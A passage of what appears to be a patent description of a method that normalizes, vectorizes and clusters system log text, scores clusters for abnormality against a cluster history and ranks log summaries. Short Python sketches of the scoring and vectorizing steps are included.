FIGS. 3A-3B are flow diagrams that illustrate a method for summarizing operational log data including text data related to operations in a computer system in accordance with an implementation of the disclosure. The log data is stored in a log database. At a step 302, text data is obtained from the log database and the obtained text data is normalized by removing variable parts of the text data to generate normalized text data. At a step 304, one or more vectors of numerical values are generated. The numerical values are related to terms present in the normalized text data. At a step 306, clusters of similar vectors are generated by grouping the vectors based on one or more clustering criteria. At a step 308, auxiliary content related to entities in the computer system associated with operations corresponding to the obtained text data is extracted from the text data obtained from the log database, and a part of the auxiliary content corresponding to the vectors in the cluster is assigned to each cluster. At a step 310, one or more representative vectors are determined for each cluster amongst the vectors in the cluster. At a step 312, an abnormality score is determined for each cluster related to recurrence of the cluster over a determined period of time by comparing the cluster with other clusters stored in a cluster history over the period of time. At a step 314, a log summary is generated for each cluster based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

This method provides faster summarization of key log information compared to manual human filtering on log management systems. This method provides log summary ranking according to the relative importance of log summaries based on historical recurrence patterns. This method provides reusability, enabling any type of log to be processed through the same pipeline with minimal re-configuration. This method provides versatility in log filtering by giving a user the opportunity to define different tokenization and filter rules based on a category of the logs. The log summarizer provided by this method may be used to dynamically filter out noise in large log streams for operations activities. This method provides log analytics capabilities with a public cloud offering. This method may normalize, embed, and cluster operational logs and transform each cluster back into a log template and a representative log. This method may associate auxiliary entities with clusters and assign related content to clusters. This method may use historical clusters to rank a new candidate cluster as recurrent or not.

This method applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. This method also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. This method may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

Optionally, prior to generating the vectors, normalized text data are filtered according to one or more filtering rules.

Optionally, generating the clusters of similar vectors includes determining distances between the vectors, and grouping the vectors based on the determined distances.

Optionally, determining, for each cluster, one or more representative vectors amongst the vectors in the cluster includes determining the vector, amongst the vectors in the cluster, closest to the center of the cluster and selecting the determined vector as being a representative vector.

Optionally, determining, for each cluster, one or more representative vectors amongst the vectors in the cluster includes determining an average distance between each vector in the cluster and each of the other vectors in the cluster, and selecting the vector having the smallest average distance as being a representative vector.

Optionally, determining, for each cluster, an abnormality score includes determining the distances between the center of the cluster and the centers of each cluster stored in the cluster history, and determining the abnormality score based on the determined distances. Optionally, determining, for each cluster, an abnormality score includes determining the average distances between each of the vectors in the cluster and each of the vectors of each cluster stored in the cluster history, and determining the abnormality score based on the determined average distances.
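The center-based variant above can be sketched as follows. The text leaves open how the determined distances are turned into a score; this sketch assumes the score is the distance to the nearest historical center, so that a cluster close to any past cluster counts as recurrent. The function names are hypothetical.

```python
import math


def euclidean(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def centre(vectors):
    """Arithmetic mean of the vectors in a cluster."""
    return [sum(column) / len(vectors) for column in zip(*vectors)]


def abnormality_score(cluster, cluster_history):
    """Assumed score: distance from this cluster's centre to the nearest past centre."""
    own_centre = centre(cluster)
    return min(
        (euclidean(own_centre, centre(past)) for past in cluster_history),
        default=float("inf"),  # empty history: nothing to recur against
    )


if __name__ == "__main__":
    history = [[(0.0, 0.0), (2.0, 0.0)], [(10.0, 10.0), (12.0, 10.0)]]
    print(abnormality_score([(1.0, 0.0), (1.0, 0.2)], history))
    print(abnormality_score([(50.0, 50.0), (52.0, 50.0)], history))
```

Sorting clusters by this score in descending order places the least recurrent clusters at the top of the summary list.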

Optionally, each generated cluster over the determined period of time is stored in the cluster history.

Optionally, determining, for each cluster, an abnormality score includes generating the cluster history over the determined period of time from text data history in the log database corresponding to the period of time.

Optionally, generating one or more vectors of numerical values includes generating one or more fixed-length vectors of numerical values, the numerical values being related to occurrence and/or occurrence frequency of terms in the normalized text data.
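A fixed-length vector of term occurrence counts can be built with a shared vocabulary, as in the minimal sketch below. Whitespace tokenization and the alphabetical ordering of the vocabulary are assumptions of the sketch; terms outside the vocabulary are ignored.

```python
from collections import Counter


def build_vocabulary(normalized_logs):
    """Map every distinct term to a fixed position in the vector."""
    terms = sorted({term for line in normalized_logs for term in line.split()})
    return {term: index for index, term in enumerate(terms)}


def to_count_vector(line, vocabulary):
    """Occurrence counts of the line's terms, one slot per vocabulary term."""
    vector = [0] * len(vocabulary)
    for term, count in Counter(line.split()).items():
        index = vocabulary.get(term)
        if index is not None:
            vector[index] = count
    return vector


if __name__ == "__main__":
    logs = ["user <NUM> logged in", "user <NUM> logged out", "retry retry failed"]
    vocabulary = build_vocabulary(logs)
    for line in logs:
        print(to_count_vector(line, vocabulary))
```

Every log line maps to a vector of the same length, which is what allows distances between arbitrary pairs of logs to be computed in the clustering step.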

In an aspect, there is provided a computer program product including program instructions for performing the method, when executed by one or more processors in a computer system.

FIG. 4 is an illustration of an exemplary computing arrangement 400 (e.g. a storage device) in which the various architectures and functionalities of the various previous implementations may be implemented. As shown, the computing arrangement 400 includes at least one processor 404 that is connected to a bus 402, wherein the computing arrangement 400 may be implemented using any suitable protocol, such as PCI (Peripheral Component Interconnect), PCI-Express, AGP (Accelerated Graphics Port), HyperTransport, or any other bus or point-to-point communication protocol(s). The computing arrangement 400 also includes a memory 406.

Control logic (software) and data are stored in the memory 406, which may take the form of random-access memory (RAM). In the present description, a single semiconductor platform may refer to a sole unitary semiconductor-based integrated circuit or chip. It should be noted that the term single semiconductor platform may also refer to multi-chip modules with increased connectivity which simulate on-chip operation, and make substantial improvements over utilizing a conventional central processing unit (CPU) and bus implementation. Of course, the various modules may also be situated separately or in various combinations of semiconductor platforms per the desires of the user.

The computing arrangement 400 may also include a secondary storage 410. The secondary storage 410 includes, for example, a hard disk drive and a removable storage drive, representing a floppy disk drive, a magnetic tape drive, a compact disk drive, a digital versatile disk (DVD) drive, a recording device, or a universal serial bus (USB) flash memory. The removable storage drive at least one of reads from and writes to a removable storage unit in a well-known manner.

Computer programs, or computer control logic algorithms, may be stored in at least one of the memory 406 and the secondary storage 410. Such computer programs, when executed, enable the computing arrangement 400 to perform various functions as described in the foregoing. The memory 406, the secondary storage 410, and any other storage are possible examples of computer-readable media.

In an implementation, the architectures and functionalities depicted in the various previous figures may be implemented in the context of the processor 404, a graphics processor coupled to a communication interface 412, an integrated circuit (not shown) that is capable of at least a portion of the capabilities of both the processor 404 and a graphics processor, or a chipset (i.e., a group of integrated circuits designed to work and sold as a unit for performing related functions).

Furthermore, the architectures and functionalities depicted in the various previous figures may be implemented in the context of a general computer system, a circuit board system, a game console system dedicated for entertainment purposes, or an application-specific system. For example, the computing arrangement 400 may take the form of a desktop computer, a laptop computer, a server, a workstation, a game console, or an embedded system.

Furthermore, the computing arrangement 400 may take the form of various other devices including, but not limited to a personal digital assistant (PDA) device, a mobile phone device, a smart phone, a television, etc. Additionally, although not shown, the computing arrangement 400 may be coupled to a network (e.g., a telecommunications network, a local area network (LAN), a wireless network, a wide area network (WAN) such as the Internet, a peer-to-peer network, a cable network, or the like) for communication purposes through an I/O interface 408.

It should be understood that the arrangement of components illustrated in the figures described is exemplary and that other arrangements may be possible. It should also be understood that the various system components (and means) defined by the claims, described below, and illustrated in the various block diagrams represent components in some systems configured according to the subject matter disclosed herein. For example, one or more of these system components (and means) may be realized, in whole or in part, by at least some of the components illustrated in the arrangements illustrated in the described figures.

In addition, while at least one of these components is implemented at least partially as an electronic hardware component, and therefore constitutes a machine, the other components may be implemented in software that when included in an execution environment constitutes a machine, hardware, or a combination of software and hardware. Although the disclosure and its advantages have been described in detail, it should be understood that various changes, substitutions, and alterations can be made herein without departing from the spirit and scope of the disclosure as defined by the appended claims.